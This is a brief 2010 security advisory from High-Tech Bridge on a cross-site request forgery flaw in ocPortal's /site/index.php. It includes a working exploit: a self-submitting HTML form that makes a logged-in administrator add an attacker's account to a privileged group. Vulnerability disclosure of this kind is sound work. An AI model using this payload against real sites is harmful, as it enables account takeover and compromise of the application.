Cross-site request forgery (CSRF) in ocPortal

2010-05-05T00:00:00
ID HTB22369
Type htbridge
Reporter High-Tech Bridge
Modified 2010-05-05T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered vulnerability in ocPortal which could be exploited to perform CSRF attacks.

1) Cross-site request forgery (CSRF) ocPortal
The vulnerability exists due to insufficient validation of the request origin in /site/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and add arbitrary account to arbitrary group. Successful exploitation might result in complete compromise of the application.

Exploitation example:
<form action="http://host/site/index.php?page=groups&type=add_to&id=2" method="post" >
<input type="hidden" name="username" value="hacker" >
</form>
<script>
document.forms[0].submit()
</script>